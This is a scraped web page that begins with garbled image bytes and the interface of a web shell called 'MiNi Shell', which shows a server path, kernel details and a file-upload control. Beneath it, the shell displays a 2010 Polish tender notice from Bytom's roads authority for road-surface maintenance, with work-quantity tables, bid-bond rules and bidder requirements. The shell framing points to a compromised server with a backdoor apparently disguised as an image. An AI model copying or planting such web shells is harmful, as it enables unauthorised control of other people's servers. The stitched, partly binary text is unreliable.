JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100812/248530-N-2010.html

<p class="kh_header"><b>Bytom: Bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku - II</b><br>
<b>Numer ogłoszenia: 248530 - 2010; data zamieszczenia: 12.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytom - Miejski Zarząd Dróg i Mostów , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 032 3969700, faks 032 3969702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdim.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku - II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2010 roku obejmujące niżej wymienione trzy zadania:
a) Zadanie nr 1 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Górniki, Stolarzowice, Sucha Góra, Miechowice, Karb, Bobrek, Stroszek, Os. Na Wzgórzu;
b) Zadanie nr 2 - bieżące utrzymanie nawierzchni jezdni na drogach gminnych w obrębach: Centrum, Rozbark, Łagiewniki, Szombierki.
c) Zadanie nr 3 - bieżące utrzymanie nawierzchni jezdni na drogach krajowych, wojewódzkich i powiatowych.
Podział miasta Bytomia na poszczególne obręby zawiera mapka, stanowiąca załącznik nr 10 do niniejszej specyfikacji. Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia w terenie.

2. Przedmiot zamówienia opisany został szczegółowo w:
a) Przedmiarze Robót,
b) Specyfikacjach Technicznych Wykonania i Odbioru Robót (STWiOR),
c) Założeniach do kalkulacji robót,
d) Wzorze Umowy, które stanowią załączniki do niniejszej specyfikacji.

3. Wykonawca winien udzielić co najmniej 36 miesięcznej gwarancji i rękojmi na wykonane roboty, liczonej od dnia odbioru końcowego potwierdzonego protokołem końcowym.

4. Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości robót do wykonania:
a/ dla Zadania nr 1 
Lp.	Rodzaj robót	Orientacyjna (szacunkowa) 
ilość robót	Jednostka miary
1	remont cząstkowy nawierzchni bitumicznej	22,00	t
2	mechaniczna rozbiórka nawierzchni bitumicznej grub. 10cm	300,00	m2
3	ręczne ułożenie nawierzchni bitumicznej grub. 5cm  w-wa wiążąca	300,00	m2
4	ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5cm	300,00	m2
5	mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grubości 5cm	1500,00	m2
6	mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grubości 5cm	1500,00	m2
7	cięcie piłą nawierzchni bitumicznej grubości 6-10cm	500,00	m
8	frezowanie nawierzchni bitumicznej grubości 10cm	1000,00	m2
9	wyrównanie nawierzchni masą asfaltową na zimno	0,50	t
10	regulacja pionowa krat ściekowych ulicznych	20,00	szt.
11	regulacja pionowa krat włazów kanałowych	15,00	szt.
12	regulacja pionowa krat studzienek dla zaworów wodociągowych i gazowych mineralno-asfaltową	10,00	szt.
13	remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	5,00	t
14	wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	15,00	t
15	plantowanie poboczy	300,00	m2
16	wypełnienie szczelin w nawierzchni bitumicznej	400,00	m
17	rozebranie i ułożenie krawężnika betonowego 15x30cm z wymianą na nowy na ławie betonowej z oporem	100,00	m
18	mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20cm	200,00	m2
19	mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego)  o grubości w-wy 20cm	200,00	m2
20	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm szarej na podsypce cementowo-piaskowej	200,00	m2
21	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm kolorowej na podsypce cementowo-piaskowej	100,00	m2
22	rozebranie i ułożenie kostki kamiennej rzędowej 14cm do 19cm z odzysku	50,00	m2
23	rozebranie i ułożenie kostki kamiennej nieregularnej do 14cm z odzysku	20,00	m2
24	ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10cm	275,00	m2

b/ dla Zadania nr 2
Lp.	Rodzaj robót	Orientacyjna (szacunkowa) 
ilość robót	Jednostka miary
1	remont cząstkowy nawierzchni bitumicznej	22,00	t
2	mechaniczna rozbiórka nawierzchni bitumicznej grub. 10cm	300,00	m2
3	ręczne ułożenie nawierzchni bitumicznej grub. 5cm  w-wa wiążąca	300,00	m2
4	ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5cm	300,00	m2
5	mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grubości 5cm	1500,00	m2
6	mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grubości 5cm	1500,00	m2
7	cięcie piłą nawierzchni bitumicznej grubości 6-10cm	500,00	m
8	frezowanie nawierzchni bitumicznej grubości 10cm	1000,00	m2
9	wyrównanie nawierzchni masą asfaltową na zimno	0,50	t
10	regulacja pionowa krat ściekowych ulicznych	20,00	szt.
11	regulacja pionowa krat włazów kanałowych	15,00	szt.
12	regulacja pionowa krat studzienek dla zaworów wodociągowych i gazowych mineralno-asfaltową	10,00	szt.
13	remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	5,00	t
14	wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	15,00	t
15	plantowanie poboczy	300,00	m2
16	wypełnienie szczelin w nawierzchni bitumicznej	400,00	m
17	rozebranie i ułożenie krawężnika betonowego 15x30cm z wymianą na nowy na ławie betonowej z oporem	100,00	m
18	mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20cm	200,00	m2
19	mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego)  o grubości w-wy 20cm	200,00	m2
20	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm szarej na podsypce cementowo-piaskowej	200,00	m2
21	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm kolorowej na podsypce cementowo-piaskowej	100,00	m2
22	rozebranie i ułożenie kostki kamiennej rzędowej 14cm do 19cm z odzysku	50,00	m2
23	rozebranie i ułożenie kostki kamiennej nieregularnej do 14cm z odzysku	20,00	m2
24	ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10cm	275,00	m2

c/ dla Zadania nr 3
Lp.	Rodzaj robót	Orientacyjna (szacunkowa) 
ilość robót	Jednostka miary
1	remont cząstkowy nawierzchni bitumicznej	50,00	t
2	mechaniczna rozbiórka nawierzchni bitumicznej grub. 10cm	600,00	m2
3	ręczne ułożenie nawierzchni bitumicznej grub. 5cm  w-wa wiążąca	500,00	m2
4	ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5cm	500,00	m2
5	mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grubości 5cm	5000,00	m2
6	mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grubości 5cm	5000,00	m2
7	cięcie piłą nawierzchni bitumicznej grubości 6-10cm	500,00	m
8	frezowanie nawierzchni bitumicznej grubości 10cm	5000,00	m2
9	wyrównanie nawierzchni masą asfaltową na zimno	0,50	t
10	regulacja pionowa krat ściekowych ulicznych	30,00	szt.
11	regulacja pionowa krat włazów kanałowych	50,00	szt.
12	regulacja pionowa krat studzienek dla zaworów wodociągowych i gazowych mineralno-asfaltową	15,00	szt.
13	remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	5,00	t
14	wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	30,00	t
15	plantowanie poboczy	1000,00	m2
16	wypełnienie szczelin w nawierzchni bitumicznej	1000,00	m
17	rozebranie i ułożenie krawężnika betonowego 15x30cm z wymianą na nowy na ławie betonowej z oporem	300,00	m
18	mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20cm	300,00	m2
19	mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego)  o grubości w-wy 20cm	300,00	m2
20	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm szarej na podsypce cementowo-piaskowej	300,00	m2
21	ułożenie nawierzchni z kostki betonowej nowej grubości 8cm kolorowej na podsypce cementowo-piaskowej	100,00	m2
22	rozebranie i ułożenie kostki kamiennej rzędowej 14cm do 19cm z odzysku	50,00	m2
23	rozebranie i ułożenie kostki kamiennej nieregularnej do 14cm z odzysku	20,00	m2
24	ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10cm	275,00	m2
25	Przełożenie kabli i słupów oświetleniowych	53,00	mb
26	Przebudowa kabli energetycznych średniego i niskiego napięcia	154,00	mb
27	Demontaż i montaż kabli teletechnicznych miedzianych	950,00	mb
28	Przebudowa kabli teletechnicznych i światłowodowych	1892,00	mb

Podczas prowadzenia prac w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikiem do Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r,  Nr 220,  poz. 2181 z  późn. zm).

5. Podane wyżej ilości robót są orientacyjne (szacunkowe),  co oznacza że ich faktyczne ilości mogą odbiegać od założeń, gdyż zlecanie robót odbywać się będzie wg bieżących potrzeb Zamawiającego na podstawie zleceń. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych robót danego rodzaju i cen jednostkowych podanych w ofercie Wykonawcy, do wysokości łącznej ceny ofertowej wskazanej w formularzu ofertowym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7, 45.23.32.23-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w następującej kwocie:
a) Zadanie nr 1 - 10.000,00 zł,
b) Zadanie nr 2 - 10.000,00 zł,
c) Zadanie nr 3 - 45.000,00 zł.
2.	Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 ustawy.
3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a.	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego - tj. Gmina Bytom - Miejski Zarząd Dróg i Mostów, 41-902 Bytom ul. Smolenia 35), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b.	określenie wierzytelności, która ma być zabezpieczona gwarancją,  
c.	kwotę gwarancji,
d.	okres ważności gwarancji (nie może być krótszy niż okres związania ofertą),
e.	oświadczenie gwaranta, w którym zobowiązuje się on nieodwołalnie do bezwarunkowej zapłaty kwoty wadium na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek zatrzymania wadium wymienionych w ustawie Prawo zamówień publicznych.
Powyższe zapisy stosuje się również do poręczeń wskazanych w art. 45 ust 6 pkt 2 i 5 ustawy
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Getinbank O/Bytom: 43 1560 1049 0000 9030 0026 9731.  Do oferty należy dołączyć kopię polecenia przelewu.
5.	Wadium wnoszone w innych dopuszczalnych formach należy w oryginale złożyć w siedzibie Zamawiającego - 41-902 Bytom, ul. Smolenia 35 (II piętro - pok. nr 6 - Dział Zamówień Publicznych), a kopię wadium dołączyć do oferty.  
6.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi wpływ środków na rachunek Zamawiającego i uznanie środków na tym rachunku przed upływem terminu składania ofert.
7.	Zamawiający zwraca wadium  w przypadkach wymienionych w art. 46 ustawy. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 1a ustawy.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać,  że:
a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty remontowe nawierzchni jezdni dróg i ulic z mieszanek mineralno-bitumicznych na łączną wartość co najmniej:
- 250.000,00 zł brutto		- w odniesieniu do Zadania nr 1,
- 250.000,00 zł brutto		- w odniesieniu do Zadania nr 2,
- 1.000.000,00 zł brutto		- w odniesieniu do Zadania nr 3,
i  przedłożyć dokument (-ty)  potwierdzający (-ce), że robota (-ty)  te została (-y) wykonana (-e) zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona (-e).  
Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. VI SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje narzędziami i urządzeniami technicznymi w celu realizacji zamówienia tj. co najmniej:
a)  jednym walcem statycznym, 
b) jednym rozściełaczem masy bitumicznej, 
c) jednym kotłem do produkcji asfaltu lanego,  
d)  jedną frezarką do nawierzchni bitumicznej

Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. VI SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje:
a) co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osoby posiadającej w/w uprawnienia.
Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. VI SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający przewiduje możliwość zmiany strony umowy tj. następstwo prawne wynikające z odrębnych przepisów, 
2) Zamawiający przewiduje możliwość dokonania zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu robót, bądź wprowadzenia nowego podwykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdim.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg i Mostów (II piętro, pok. nr 6)
ul. Smolenia 35
41-902 Bytom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2010 godzina 10:00, miejsce: Miejski Zarząd Dróg i Mostów (II piętro, pok. nr 6)
ul. Smolenia 35
41-902 Bytom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
